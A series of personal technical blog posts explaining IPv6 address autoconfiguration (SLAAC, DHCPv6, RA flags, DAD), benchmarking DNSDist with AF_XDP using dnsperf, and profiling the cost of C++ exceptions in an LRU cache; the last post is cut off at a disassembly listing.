Published 2023-01-09 · Updated 2023-03-19 · 19 min read (about 2874 characters)

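Networking Odds and Ends: IPv6 Address Autoconfiguration

Preface

In Y7n05h's subjective experience, IPv4 address exhaustion has long been old news, yet IPv6 adoption in recent years has stayed lukewarm.
IPv6 may be more widely used overseas, but Y7n05h has no way of knowing, so this article does not discuss it further.

In an anonymous survey published by Y7n05h, 97 respondents had provided the following data on IPv6 adoption as of 2023-01-07T19:57+00:00:

Only 46% of respondents said all of their home network devices support IPv6
Only 58% of respondents said their ISP provides IPv6 access
Only 13% of respondents said all the services they like or regularly use are reachable over IPv6
29% of respondents said they still use IPv4 only and do not use IPv6
No respondent said they use IPv6 only and do not use IPv4

Notes:

The survey is still open and respondents can change their answers at any time, so the figures above describe only the results as of 2023-01-07T19:57+00:00.
Y7n05h cannot verify the truthfulness or accuracy of the submitted answers; the figures are for reference only.

Judging from these figures, IPv6 adoption is still far from encouraging, even after all these years.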

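The biggest (and best-known) difference between IPv6 and IPv4 is address length. An IPv6 address is 16 bytes, only four times the 4 bytes of an IPv4 address, yet the address space grows by a factor of $2^{96}$ (from $2^{32}$ to $2^{128}$ addresses). It is often said that IPv6 could assign an address to every grain of sand in the world.
By extending the address length, IPv6 does solve IPv4 address exhaustion at the root.
Beyond that, IPv6 reduces the complexity of software and hardware implementations by dropping the IPv4 header checksum, moving IPv4 Options out of the fixed header into extension headers, and no longer letting routers fragment packets in transit (only the sending host may fragment).
For IPv4, ARP, DHCP and ICMP are also important parts of communication. Unfortunately for anyone used to them, IPv6 changes a lot here.
DHCPv6 and ICMPv6 exist, but there is no "ARPv6", even though one might expect it. In addition, DHCPv6 is not the only way to configure addresses in IPv6.
Other detail changes include removing broadcast and reworking anycast and multicast. These changes fix many problems of IPv4 and make the network-layer protocol leaner.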

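For more differences between IPv6 and IPv4, see the comparison with IPv4.

IPv6 brings plenty of improvements, so what exactly makes its adoption so difficult?

Y7n05h once thought the 40-byte IPv6 header was to blame: users accustomed to the small 20-byte IPv4 header might not adapt and might see it as a performance problem.
That view is hard to sustain. Next to the large overhead of VXLAN, the 20 extra bytes of IPv6 are tiny.
VXLAN has long been used heavily in production. 2.5 Gbit/s and even 10 Gbit/s networks are becoming common among home users (to say nothing of how far data-center networks have moved on). Worrying about the extra 20 bytes of IPv6 is probably unnecessary.

The difficulty may instead have to do with developers being unwilling to handle the extra program complexity of dual stack. Compared with the newcomer IPv6, IPv4 is an old friend, and it is not surprising that developers skip IPv6 support to keep their programs simple.
It may also have to do with ISPs still supporting IPv6 less well than IPv4.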

IPv6 address types

Unicast addresses

Below are some common categories of IPv6 unicast addresses; for a more detailed list, see IPv6 special unicast addresses:

Category	Range	Notes
Global Unicast Address	2000::/3	Similar to an IPv4 public address
Link-Local Address	fe80::/10	Valid only within the link
Site-Local Address	fec0::/10	Deprecated by RFC 3879
Unique Local Address	fc00::/7	Similar to an IPv4 private address
Unspecified Address	::/128	Similar to `0.0.0.0/32`
Loopback Address	::1/128	Similar to `127.0.0.0/8`

Scope: global unicast > unique local > link-local

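Multicast addresses

All IPv6 multicast addresses lie in ff00::/8.

Multicast also plays an important role in IPv6 communication, but this article does not go into it in depth.
Only the multicast addresses that appear later in this article are listed here; for more, see IPv6 multicast addresses:

ff02::1 All nodes on the local network segment
ff02::2 All routers on the local network segment
ff02::1:ff00:0/104 Solicited-node multicast address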

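The solicited-node multicast address is used in DAD (Duplicate Address Detection). To get the solicited-node multicast address for an IPv6 unicast address, take the low 24 bits of the unicast address and append them to the 104-bit prefix ff02::1:ff00:0/104 (equivalently, bitwise-OR them into ff02::1:ff00:0).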
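As a rough illustration of that mapping, the sketch below builds the solicited-node multicast address from a unicast address held as 16 raw bytes. The alias `Ipv6Bytes` and the function name `solicitedNodeMulticast` are made up for this example and are not taken from any library.

```cpp
#include <array>
#include <cstdint>

// 16 raw bytes of an IPv6 address in network order (hypothetical alias).
using Ipv6Bytes = std::array<std::uint8_t, 16>;

// Combine the fixed 104-bit prefix ff02::1:ff00:0/104 with the low 24 bits
// of the unicast address.
inline Ipv6Bytes solicitedNodeMulticast(const Ipv6Bytes &unicast) {
    Ipv6Bytes group{};        // start from all zeros
    group[0] = 0xff;          // ff02::/16, link-local multicast scope
    group[1] = 0x02;
    group[11] = 0x01;         // ...:0001:...
    group[12] = 0xff;         // ...:ffXX:XXXX
    group[13] = unicast[13];  // low 24 bits copied from the unicast address
    group[14] = unicast[14];
    group[15] = unicast[15];
    return group;
}
```

For instance, fe80::1234:56ff:fe78:9abc maps to ff02::1:ff78:9abc, so hosts whose addresses share the same low 24 bits listen on the same group.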

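The IPv6 address autoconfiguration process

TIP
This section is an overview of the IPv6 address autoconfiguration flow. The terms Stateless and Stateful used here are explained later.

The figure below shows the IPv6 address autoconfiguration flow; it leaves out the steps related to DAD (Duplicate Address Detection).

Figure: IPv6 address autoconfiguration flow [1]

The next figure shows data captured with Wireshark during IPv6 address autoconfiguration:

Figure: packet capture of IPv6 address autoconfiguration
Figure: packet No.19, Router Advertisement
Packets No.6 through No.22 perform address autoconfiguration:

No.6 runs DAD on the Link-Local Address configured via the Stateless method
No.18 and No.19 request and receive the RA message
No.21 and No.22 run DAD on the two Global Unicast Addresses configured via the Stateless method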

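Categories of address autoconfiguration methods

Link-local address configuration

A Link-Local Address can be configured in two ways:

Manual configuration
Stateless address autoconfiguration

Global unicast address / unique local address autoconfiguration

Global Unicast Addresses and Unique Local Addresses are configured in the same way:

Manual configuration
Stateless address autoconfiguration
Stateful address autoconfiguration

Explanation of the configuration methods

The heading sounds complicated, but in short:
A newly connected device picks an IP address according to some policy. Before using it, the device runs DAD on the address to check whether another device already uses it; if not, the device uses it.
The policies fall into three broad classes:

Manual configuration
Stateless address autoconfiguration
Stateful address autoconfiguration

Manual configuration needs no further explanation; the two automatic methods are discussed below.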

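Stateless Address Autoconfiguration (SLAAC)

Stateless means there is no control center: no controller manages the assignment of IP addresses, and each device picks its own address.
Common ways to generate an address in SLAAC are:

Modified EUI-64
Random

Modified EUI-64 derives a 64-bit interface identifier from the NIC's MAC address and appends it to the prefix taken from the Prefix Information option of the RA message to form the IP address.
Random picks a random interface identifier instead and appends it to the prefix from the RA message in the same way.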
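The Modified EUI-64 step can be sketched roughly as follows, assuming a 48-bit MAC address and a /64 prefix: the MAC is split in half, ff:fe is inserted in the middle, and the universal/local bit (0x02) of the first byte is flipped. All type and function names below are hypothetical and exist only for this illustration.

```cpp
#include <array>
#include <cstdint>

using Mac48 = std::array<std::uint8_t, 6>;        // hypothetical alias
using InterfaceId = std::array<std::uint8_t, 8>;  // hypothetical alias
using Prefix64 = std::array<std::uint8_t, 8>;     // hypothetical alias
using Ipv6Bytes = std::array<std::uint8_t, 16>;   // hypothetical alias

// Modified EUI-64: insert ff:fe between the two halves of the MAC address
// and flip the universal/local bit of the first byte.
inline InterfaceId modifiedEui64(const Mac48 &mac) {
    return InterfaceId{{static_cast<std::uint8_t>(mac[0] ^ 0x02), mac[1], mac[2],
                        0xff, 0xfe, mac[3], mac[4], mac[5]}};
}

// Concatenate the /64 prefix (upper 8 bytes) with the interface identifier
// (lower 8 bytes). No bitwise AND is involved.
inline Ipv6Bytes makeAddress(const Prefix64 &prefix, const InterfaceId &iid) {
    Ipv6Bytes addr{};
    for (int i = 0; i < 8; ++i) {
        addr[i] = prefix[i];
        addr[8 + i] = iid[i];
    }
    return addr;
}
```

With the MAC 00:11:22:33:44:55 and the documentation prefix 2001:db8::/64, this yields 2001:db8::211:22ff:fe33:4455. The Random method would only replace `modifiedEui64` with a random 64-bit value.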

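Stateful Address Autoconfiguration

Stateful means there is a control center: a controller manages the assignment of IP addresses, and the device receives its address from that controller instead of picking one itself.
You have surely thought of DHCP in IPv4, which fits this requirement exactly. Indeed, for IPv6, Stateful means DHCPv6.

DHCPv6 is commonly used in two modes:

Stateful DHCPv6
Stateless DHCPv6

What is the difference between the two?
Stateful DHCPv6 means using all the information obtained from DHCPv6, including the address.
Stateless DHCPv6 means generating the IPv6 address in the Stateless way but obtaining other network information (for example DNS) from DHCPv6.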

Router Advertisement (RA)

Routers on the link periodically multicast RA messages to ff02::1. To obtain an RA right away, a device that has just joined the link usually multicasts an RS (Router Solicitation) message to ff02::2, prompting the routers to reply with an RA.
This is the RA message captured earlier.
Figure: packet No.19, Router Advertisement

The RA carries Prefix Information options, which SLAAC uses to generate IP addresses (as described above).
A Prefix Information option has the following flags:

Flag: 0xc0, On-link flag(L), Autonomous address-configuration flag(A)
1... .... = On-link flag(L): Set
.1.. .... = Autonomous address-configuration flag(A): Set
..0. .... = Router address flag(R): Not set
...0 0000 = Reserved: 0

Of these, the A flag matters most for IPv6 address autoconfiguration:

A: if the A flag is set, the host configures an IP address for this prefix via SLAAC. (Installing a route for the prefix does not depend on the A flag; it is governed by the L flag.)

In the Router Advertisement itself, the following flags deserve attention:

Flags: 0x08, Prf (Default Router Preference): High
0... .... = Managed address configuration: Not set
.0.. .... = Other configuration: Not set
..0. .... = Home Agent: Not set
...0 1... = Prf (Default Router Preference): High (1)
.... .0.. = Proxy: Not set
.... ..0. = Reserved: 0

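M: Managed address configuration
O: Other configuration

If M == true, Stateful DHCPv6 is used for address configuration (regardless of O).
If ( M == false && O == true ), Stateless DHCPv6 is used: the address comes from SLAAC and other information from DHCPv6.
If ( M == false && O == false ), only Stateless configuration (SLAAC) is used, without DHCPv6.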
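The three rules above can be written as a small decision function. This is only a sketch: the enum, struct and function names are invented for the example, and the bit positions (M = 0x80, O = 0x40) are read off the Wireshark dump shown earlier. A real host also has to honor the A flag of each Prefix Information option, which is ignored here.

```cpp
#include <cstdint>

// Hypothetical names for the three outcomes described in the text.
enum class AddressConfig { StatefulDhcpv6, StatelessDhcpv6, SlaacOnly };

struct RaFlags {
    bool managed;  // M flag
    bool other;    // O flag
};

// In the RA flags byte, M is the most significant bit and O the next one.
inline RaFlags decodeRaFlags(std::uint8_t flags) {
    return RaFlags{(flags & 0x80) != 0, (flags & 0x40) != 0};
}

// M wins over O; with neither set, only SLAAC is used.
inline AddressConfig chooseConfig(RaFlags f) {
    if (f.managed) return AddressConfig::StatefulDhcpv6;
    if (f.other) return AddressConfig::StatelessDhcpv6;
    return AddressConfig::SlaacOnly;
}
```

For the captured RA with Flags: 0x08, both M and O are clear, so `chooseConfig(decodeRaFlags(0x08))` selects `SlaacOnly`, which matches the capture where both global addresses were configured via the Stateless method.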

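For a more detailed description of RA messages, see: ICMPv6 RA and RS messages. (Note: that document is somewhat dated and lacks information on DNS support in RA messages.)

Neighbor Advertisement (NA)

Neighbor Solicitation (NS) and Neighbor Advertisement (NA) messages play a role similar to ARP Request and ARP Reply in IPv4.
Unlike an ARP Request, which is broadcast, an NS is multicast to the solicited-node multicast address of the IP address being queried. NICs can filter multicast frames and accept only the groups they need, which is more efficient than broadcast.
NS and NA messages are also used for Duplicate Address Detection (DAD): when a device is about to use an IP address, it multicasts an NS to the corresponding solicited-node multicast address, asking for the MAC address of that IP address. If no reply arrives within a certain time, no device on the link is using the address; otherwise the address is already in use. Devices run DAD on IPv6 addresses regardless of how the addresses were configured.

References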

Published 2022-08-16 · 11 min read (about 1648 characters)

Speed up DNSDist with AF_XDP

Chinese readers can read the Chinese version of this article.
中文读者可阅读本文的中文版本。

Preface

DNSDist is an excellent DNS load balancer, and AF_XDP is an emerging high-performance Linux asynchronous IO interface that benefits from eBPF.
It is a great honor for Y7n05h to participate in the AF_XDP transformation of DNSDist as a contributor.

The changes to the UDP part of DNSDist have long since come to an end. This performance-improving modification requires profiling data to validate.

So, let’s start the fun performance analysis.

Test environment information

Laptop
OS: ArchLinux
Kernel Version: 5.19.1-arch2-1
CPU: AMD Ryzen 7 4800H with Radeon Graphics
MEM: DDR4 64G
NIC: Intel Corporation Wi-Fi 6 AX200 (rev 1a)
DNSPerf Version: 2.9.0
GCC Version: 12.1.1
Libxdp Version:1.2.5

PC1
OS: ArchLinux
Kernel Version: 5.19.1-arch2-1
CPU: Intel(R) Core(TM) i5-8500 CPU @ 3.00GHz
MEM: DDR4 8G
NIC: Intel Corporation Wi-Fi 6 AX200 (rev 1a)

PC2
OS: Ubuntu
Kernel Version: 5.15.0-46-generic
CPU: 12th Gen Intel(R) Core(TM) i7-12700KF
MEM: DDR4 64G
NIC: Broadcom Inc. and subsidiaries BCM4360 802.11ac Wireless Network Adapter (rev 03)

Thanks to @yegetables for lending PC2 to Y7n05h.

Source Code：
DNSDist With AF_XDP (AF_XDP version): https://github.com/Y7n05h/pdns/commit/d42e356a48a433a9f4efae9c3dd648101a37abdf
DNSDist Without AF_XDP(Normal version): https://github.com/Y7n05h/pdns/commit/f5e76c2a6932ec4360d38219fb515d26d538b40d

In this test, Y7n05h uses Laptop to generate the requests for testing, PC1 to run the DNSDist instance to be tested, and PC2 to run the SmartDNS service.
Laptop, PC1 and PC2 are all connected to the gateway (192.168.30.1) using WIFI, and Laptop, PC1 and PC2 access each other via WIFI. Unfortunately, the network used in this test environment was still used by numerous other devices during the test, so Y7n05h cannot exclude experimental errors caused by fluctuations in the network environment.

The test tool uses DNSPerf. The test resolves A records for 12018 different domains, only once for each domain in each test.

For the tests, SmartDNS was used as the DNS server. There is no particular reason to use SmartDNS, except that Y7n05h is familiar with it and it is easy to build and deploy SmartDNS on Ubuntu.

During the test, Y7n05h used Laptop to send DNS queries to PC1 running DNSDist. DNSDist on PC1 parses and processes each query and, if necessary, forwards it to SmartDNS on PC2. SmartDNS then, if necessary, sends the query concurrently to the 4 DNS servers 1.1.1.1, 1.0.0.1, 8.8.8.8 and 119.29.29.29, and replies to DNSDist with the first response received.

For this test, Y7n05h frequently sent a large number of DNS queries to the 4 public DNS servers above. Y7n05h sincerely thanks Cloudflare, Google and DNSPod for providing these public DNS services. (Although Y7n05h performed a large number of DNS queries during the test, these queries are cached by DNSDist and SmartDNS, so not every query reaches the servers above. Y7n05h therefore considers this acceptable and fundamentally different from a DDoS.) Also, to eliminate as much cache-related interference as possible, before the test started Y7n05h used DNSPerf to repeatedly send SmartDNS resolution requests for all domains used in the test.

In the current network environment, Y7n05h’s subjective guess is that DNS query requests are still dominated by A records and AAAA records. Since Y7n05h’s environment does not have good IPv6 support, the resolution of A records was used as a performance indicator in this test. Since Y7n05h cannot verify the correctness of the DNS resolution results, we do not consider correctness as a metric in this performance analysis.

It should also be noted that the DNSDist configuration used in this test has been simplified for testing purposes and may differ significantly from the DNSDist configuration in the production environment. Therefore, this test by Y7n05h does not fully reflect the performance of AF_XDP’s optimization of DNSDist in a production environment.

As we all know, the DNS protocol uses recursive resolution, and the response time of requests is greatly affected by whether the query domain hits the DNS server’s cache or not.

In summary, this test by Y7n05h may be biased and may be inaccurate. The following is only the opinion of Y7n05h.

Performance Tests

uniq.txt contains exactly 12018 distinct domains.

In all charts in this article, the horizontal axis is the run number, which increases by 1 for each DNSPerf run. Each line shows the results of repeated DNSPerf runs against the same DNSDist process instance, with points ordered chronologically from left to right. No two DNSPerf runs overlap in time.

To keep the discussion short, Y7n05h uses the following abbreviations:

The version of DNSDist that uses AF_XDP is called the “AF_XDP version”.
The version of DNSDist that does not use AF_XDP is called the “Normal version”.

Test 1

The following command was used in this test to run DNSPerf:

dnsperf -s 192.168.30.170 -p 5300 -d uniq.txt

In test 1, Y7n05h ran the AF_XDP version first, then the Normal version, and finally the AF_XDP version again.

Looking at the average latency first, it trends downward on every line. The most likely reason is that, after multiple DNSPerf runs, SmartDNS and the upstream servers hit their caches more and more often for the domains used in this test. This is supported by the fact that the average latency of the AF_XDP version, when re-run after the Normal version, is significantly lower than in its earlier runs. With the data available so far, the effect of AF_XDP itself on average latency cannot be determined.

For lost queries, the AF_XDP version loses significantly fewer than the Normal version. The number of queries lost by the AF_XDP version tends to increase slowly with the number of runs.

For average queries per second, that is throughput, the AF_XDP version is significantly better than the Normal version. The data for the blue line was collected between the green and red lines in time, so relative to the blue line, caching boosts the green line and penalizes the red line. Taking the cache state during the blue runs as the baseline, the true throughput of the AF_XDP version lies roughly between the red and green lines. Compared with the blue line (the Normal version), that contrast is strong enough to show the throughput advantage of AF_XDP.

The runtime is the time consumed by one complete DNSPerf run. Here too the AF_XDP version outperforms the Normal version. The reasoning mirrors the throughput analysis, so Y7n05h does not repeat it.

Even allowing for the caches in DNSDist, SmartDNS and the other resolvers, which make each successive DNSPerf run faster, one conclusion is already clear: AF_XDP significantly improves DNSDist's throughput in the current scenario. Its impact on query latency may still require further testing.

Test 2

The following command was used in this test to run DNSPerf:

dnsperf -s 192.168.30.170 -p 5300 -d uniq.txt -c 500 -T 16

In Test 2, the concurrency of the test was increased by adding command line arguments. Test 2 ran the Normal version first and the AF_XDP version second.

Note: Test 2 was not run consecutively with Test 1, which may have affected the DNS cache.

Starting again with average latency: the AF_XDP version, which ran second, still shows a decreasing trend and is not significantly different from the Normal version in the last two runs. Y7n05h's personal guess is that with more runs, as the cache hit rate increases, the average latency of the AF_XDP version may drop below that of the Normal version. In the first 3 runs the average latency of the AF_XDP version was significantly higher than that of the Normal version, perhaps because stopping the Normal version and starting the AF_XDP version cleared the cache in DNSDist. The effect of AF_XDP on average latency still needs further testing.

Comparing the lost queries of the Normal and AF_XDP versions, the picture remains similar to Test 1. The number of lost queries also shows no significant change compared to Test 1.

In terms of throughput, the gap between the AF_XDP version and the Normal version increases further for more concurrent query requests, and tends to increase with the number of tests.

The AF_XDP version is significantly less time consuming than the Normal version for one DNSPerf execution. This is similar to what was found in Test 1.

Summary

AF_XDP significantly improves DNSDist throughput, but risks increasing the average latency per request (which needs to be further verified).

In terms of throughput alone, it is conservatively estimated that AF_XDP can more than double the throughput of DNSDist.

From the tests here, it appears that AF_XDP is a technique that has the potential to significantly improve the throughput of UDP-based network services.

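Published 2022-08-16 · 17 min read (about 2551 characters)

Speed up DNSDist with AF_XDP

English readers can read the English version of this article.

Preface

DNSDist is an excellent DNS load balancer, and AF_XDP is an emerging high-performance Linux asynchronous IO interface that builds on eBPF.
It is a great honor for Y7n05h to take part, as a contributor, in bringing AF_XDP to DNSDist.

The changes to the UDP part of DNSDist were finished a while ago. A modification meant to improve performance should of course not remain an armchair exercise.
Collecting load-test data and analyzing performance is the most convincing report card.

So, let's start the fun load testing.

Test environment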

PC1
OS: ArchLinux
Kernel Version: 5.19.1-arch2-1
CPU: Intel(R) Core(TM) i5-8500 CPU @ 3.00GHz
MEM: DDR4 8G
NIC: Intel Corporation Wi-Fi 6 AX200 (rev 1a)
During the test, PC1 ran only DNSDist besides the necessary system processes.

PC2
OS: Ubuntu
Kernel Version: 5.15.0-46-generic
CPU: 12th Gen Intel(R) Core(TM) i7-12700KF
MEM: DDR4 64G
NIC: Broadcom Inc. and subsidiaries BCM4360 802.11ac Wireless Network Adapter (rev 03)
During the test, the CPU, MEM and NIC of PC2 stayed under low load throughout.

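Thanks to @yegetables for providing PC2, which gave Y7n05h a stably running SmartDNS service. This was a great help for the test.

Source code:
DNSDist With AF_XDP: https://github.com/Y7n05h/pdns/commit/d42e356a48a433a9f4efae9c3dd648101a37abdf
DNSDist Without AF_XDP: https://github.com/Y7n05h/pdns/commit/f5e76c2a6932ec4360d38219fb515d26d538b40d

In this test, Y7n05h uses Laptop to generate the test traffic, PC1 to run the DNSDist instance under test, and PC2 to run the SmartDNS service.
Laptop, PC1 and PC2 are all connected to the gateway (192.168.30.1) over Wi-Fi and reach each other over Wi-Fi. Unfortunately, the network was still used by numerous other devices during the test, so Y7n05h cannot rule out experimental error caused by network fluctuations.

The test tool is DNSPerf. The test resolves A records for 12018 different domains, each domain only once per run.

SmartDNS is used as the DNS server. There is no particular reason for this, except that Y7n05h is familiar with it and it is easy to build and deploy on Ubuntu.

During the test, Y7n05h used Laptop to send DNS queries to PC1 running DNSDist. DNSDist on PC1 parses and processes each query and, if necessary, forwards it to SmartDNS on PC2. SmartDNS then, if necessary, sends the query concurrently to the 4 DNS servers 1.1.1.1, 1.0.0.1, 8.8.8.8 and 119.29.29.29, and replies to DNSDist with the first response received.

For this test, Y7n05h frequently sent a large number of DNS queries to the 4 public DNS servers above. Y7n05h sincerely thanks Cloudflare, Google and DNSPod for providing these public DNS services. (Although Y7n05h performed a large number of DNS queries during the test, these queries are cached by DNSDist and SmartDNS, so not every query reaches the servers above. Y7n05h therefore believes the test stayed within reasonable limits.) Also, to eliminate as much cache-related interference as possible, before the test started Y7n05h used DNSPerf to repeatedly send SmartDNS resolution requests for all domains used in the test.

In the current network environment, Y7n05h's subjective guess is that DNS queries are still dominated by A and AAAA records, and IPv6 support in Y7n05h's environment is poor. The resolution of A records is therefore used as the performance indicator in this test. Y7n05h also cannot verify the correctness of the DNS answers, so correctness is not considered as a metric in this analysis.

It should also be noted that the DNSDist configuration used here was simplified considerably for testing convenience and may differ significantly from a production configuration. This test therefore does not fully reflect how the AF_XDP optimization of DNSDist behaves in production.

As is well known, DNS uses recursive resolution, and the response time of a request depends heavily on whether the queried domain hits the DNS server's cache.

In summary, this test by Y7n05h may be biased and may be inaccurate. What follows is only the opinion of Y7n05h.

Load tests

uniq.txt contains exactly 12018 distinct domains.

In all charts in this article, the horizontal axis is the run number, which increases by 1 for each DNSPerf run. Each line shows the results of repeated DNSPerf runs against the same DNSDist process instance, with points ordered chronologically from left to right. No two DNSPerf runs overlap in time.

To keep the discussion short, Y7n05h uses the following abbreviations:

The version of DNSDist that uses AF_XDP is called the "AF_XDP version"
The version of DNSDist that does not use AF_XDP is called the "Normal version"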

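Test 1

The following command was used in this test to run DNSPerf:

dnsperf -s 192.168.30.170 -p 5300 -d uniq.txt

In Test 1, Y7n05h ran the AF_XDP version first, then the Normal version, and finally the AF_XDP version again.

Looking at the average latency first, it trends downward on every line. The most likely reason is that, after multiple DNSPerf runs, SmartDNS and the upstream servers hit their caches more and more often for the domains used in this test. This is supported by the fact that the average latency of the AF_XDP version, when re-run after the Normal version, is significantly lower than in its earlier runs. With the data available so far, the effect of AF_XDP itself on average latency cannot be determined.

For lost queries, the AF_XDP version loses significantly fewer than the Normal version. The number of queries lost by the AF_XDP version tends to increase slowly with the number of runs.

For average queries per second, that is throughput, the AF_XDP version is significantly better than the Normal version. The data for the blue line was collected between the green and red lines in time, so relative to the blue line, caching boosts the green line and penalizes the red line. Taking the cache state during the blue runs as the baseline, the true throughput of the AF_XDP version lies roughly between the red and green lines. Compared with the blue line (the Normal version), that contrast is strong enough to show the throughput advantage of AF_XDP.

The runtime is the time consumed by one complete DNSPerf run. Here too the AF_XDP version outperforms the Normal version. The reasoning mirrors the throughput analysis, so Y7n05h does not repeat it.

Even allowing for the caches in DNSDist, SmartDNS and the other resolvers, which make each successive DNSPerf run faster, one conclusion is already clear: AF_XDP significantly improves DNSDist's throughput in the current scenario. Its impact on query latency may still require further testing.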

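Test 2

The following command was used in this test to run DNSPerf:

dnsperf -s 192.168.30.170 -p 5300 -d uniq.txt -c 500 -T 16

In Test 2, the concurrency of the test was increased through additional command-line arguments. Test 2 ran the Normal version first and the AF_XDP version second.

Note: Test 2 was not run back to back with Test 1, which may have affected the DNS caches.

Starting again with average latency: the AF_XDP version, which ran second, still shows a decreasing trend and is not significantly different from the Normal version in the last two runs. Y7n05h's personal guess is that with more runs, as the cache hit rate increases, the average latency of the AF_XDP version may drop below that of the Normal version. In the first 3 runs the average latency of the AF_XDP version was significantly higher than that of the Normal version, perhaps because stopping the Normal version and starting the AF_XDP version cleared the cache in DNSDist. The effect of AF_XDP on average latency still needs further testing.

Comparing the lost queries of the Normal and AF_XDP versions, the picture remains similar to Test 1. The number of lost queries also shows no significant change compared to Test 1.

In terms of throughput, the gap between the AF_XDP version and the Normal version widens further under higher concurrency, and tends to keep widening with the number of runs.

The time for one DNSPerf run is clearly lower for the AF_XDP version than for the Normal version. This is similar to what was found in Test 1.

Summary

AF_XDP significantly improves DNSDist throughput, but risks increasing the average latency per request (which needs to be verified further).

In terms of throughput alone, a conservative estimate is that AF_XDP can more than double the throughput of DNSDist.

From the tests here, AF_XDP appears to be a technique with the potential to significantly improve the throughput of UDP-based network services.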

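Published 2022-05-02 · 18 min read (about 2718 characters)

A Brief Look at the Performance of C++ Exceptions

Background

This began rather oddly: while solving the LeetCode problem LRU Cache, Y7n05h wrote the following code: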

#include <stdexcept>      // std::out_of_range
#include <unordered_map>  // std::unordered_map

class LRUCache {
    struct DoubleLinkListNode {
        DoubleLinkListNode *prev;
        DoubleLinkListNode *next;
        int key;
        int value;
    };
    class DoubleLinkList {
        DoubleLinkListNode head;
        DoubleLinkListNode tail;

    public:
        int size{};
        DoubleLinkList() {
            head.prev = nullptr;
            head.next = &tail;
            tail.next = nullptr;
            tail.prev = &head;
        }
        void moveToHead(DoubleLinkListNode *node) {
            node->prev->next = node->next;
            node->next->prev = node->prev;

            node->next = head.next;
            node->prev = &head;

            head.next->prev = node;
            head.next = node;
        }
        DoubleLinkListNode *back() const {
            return tail.prev;
        }
        DoubleLinkListNode *newNode(int key, int value) {
            auto *node = new DoubleLinkListNode;

            node->next = head.next;
            node->prev = &head;

            head.next->prev = node;
            head.next = node;

            node->key = key;
            node->value = value;
            ++size;
            return node;
        }
    };


public:
    LRUCache(int capacity) : cap(capacity) {
    }


    int get(int key) {
        try {
            auto *node = map.at(key);
            list.moveToHead(node);
            return node->value;
        } catch (std::out_of_range &) {
            return -1;
        }
        return -1;
    }

    void put(int key, int value) {
        try {
            auto *node = map.at(key);
            node->key = key;
            node->value = value;
            list.moveToHead(node);
        } catch (std::out_of_range &) {
            if (list.size == cap) {
                auto *node = list.back();
                map.erase(node->key);
                map[key] = node;
                node->key = key;
                node->value = value;
                list.moveToHead(node);
            } else {
                auto *node = list.newNode(key, value);
                map[key] = node;
            }
        }
    }


    int cap = 0;
    DoubleLinkList list;
    std::unordered_map<int, DoubleLinkListNode *> map;
};

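This code was accepted, but its performance was poor: its runtime beat only 5% of C++ submissions. Y7n05h found that result hard to accept.

Every element lookup in the code is $O(1)$; the linked list is only accessed at its head or tail or directly through a node pointer; list nodes are even reused to reduce allocator overhead.
Having ruled out everything that left no room for optimization, Y7n05h's intuition was that exceptions were slowing the program down.

That is easy to fix: only LRUCache::get and LRUCache::put need to change. The code uses exceptions only to detect whether a key is in the map, so std::unordered_map::count can do that check instead.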

int get(int key) {
    if (map.count(key) == 0)
        return -1;
    auto *node = map.at(key);
    list.moveToHead(node);
    return node->value;
}

void put(int key, int value) {
    if (map.count(key)) {
        auto *node = map.at(key);
        node->key = key;
        node->value = value;
        list.moveToHead(node);
        return;
    }
    if (list.size == cap) {
        auto *node = list.back();
        map.erase(node->key);
        map[key] = node;
        node->key = key;
        node->value = value;
        list.moveToHead(node);
    } else {
        auto *node = list.newNode(key, value);
        map[key] = node;
    }
}

After this change, the runtime beat about 90% of submissions.
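A possible further refinement, not measured in this article, is to replace the `count` followed by `at` pair with a single `find`, so that the key is hashed only once per call. The helper below is a hypothetical sketch on a plain `std::unordered_map<int, int>`, not part of the submitted solution:

```cpp
#include <unordered_map>

// Hypothetical helper: one hash lookup via find(), and no exception on a miss.
inline int lookupOr(const std::unordered_map<int, int> &table, int key, int fallback) {
    auto it = table.find(key);
    return it == table.end() ? fallback : it->second;
}
```

In `LRUCache::get`, the same pattern would test the iterator returned by `map.find(key)` against `map.end()` and then use `it->second` as the node pointer. Whether this changes the LeetCode ranking noticeably is an open question here.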

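So the question is: why does a single exception affect performance this much?

Performance analysis

To compare the two versions locally, Y7n05h wrote the following test code: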

#include <cstdio>  // printf

int main() {
    LRUCache cache(2);
    for (int i = 0; i < 1000000; i++) {
        cache.put(1, 0);
        cache.put(2, 2);             
        printf("%d\n", cache.get(1));
        cache.put(3, 3);             
        printf("%d\n", cache.get(2));
        cache.put(4, 4);             
        printf("%d\n", cache.get(1));
        printf("%d\n", cache.get(3));
        printf("%d\n", cache.get(4));
    }
}

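Both versions were compiled with the same flags:

clang++ -stdlib=libc++ -O2 -flto -g lru1.cpp

To show the difference as it appears after the optimizations a modern C++ program would normally get, Y7n05h enabled O2 and LTO.

Test environment:

clang version: 13.0.1
libc++: 13.0.1
Linux Kernel version: 5.17.5
glibc version: 2.35
gcc-libs: 11.2.0
perf: 5.17

Flame graph of the program that uses exceptions:

Flame graph of the program that does not use exceptions:

If that is not clear enough, look at the output of perf diff: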

21.05%    -19.30%  libc.so.6             [.] __vfprintf_internal
          +18.98%  libgcc_s.so.1         [.] execute_cfa_program
          +13.11%  libgcc_s.so.1         [.] uw_frame_state_for
12.12%    -11.31%  libc.so.6             [.] _IO_file_xsputn
11.84%    -10.64%  libc.so.6             [.] __write
          +10.49%  libgcc_s.so.1         [.] uw_update_context_1
           +9.05%  libgcc_s.so.1         [.] _Unwind_IteratePhdrCallback
           +4.76%  libc++abi.so.1.0      [.] __gxx_personality_v0
 4.86%     -4.48%  libc.so.6             [.] _IO_file_write
 4.20%     -3.84%  libc.so.6             [.] new_do_write
           +3.60%  libc++abi.so.1.0      [.] __cxa_call_unexpected
           +3.47%  libgcc_s.so.1         [.] uw_install_context_1
           +3.44%  libgcc_s.so.1         [.] read_encoded_value_with_base
           +3.28%  libc.so.6             [.] __strlen_avx2

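execute_cfa_program, uw_frame_state_for and uw_update_context_1 change a great deal between the two versions. An important clue is that these stack-unwinding functions all live in libgcc_s.so.1.

This shows that, in this environment, a program compiled by clang also relies on the stack unwinding implemented in libgcc.

How exceptions are implemented

Until now Y7n05h only knew that exceptions work by stack unwinding and knew nothing of the details. This is a good occasion to take a brief look at how exception handling works.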

/* SimpleException.cpp */
#include <cstdio>
#include <cstdlib>
#include <exception>
void bar(unsigned int n) {
  if (n & 1) {
    throw std::exception();
  }
}

void foo(int n) {
  try {
    bar(n);
  } catch (...) {
    printf("exception\n");
  }
  printf("End\n");
}
int main(int argc, char *argv[]) { foo(atoi(argv[1])); }

Here is the disassembly of bar (Intel syntax):

0x0000000000401995 <+0>:     push   rbp
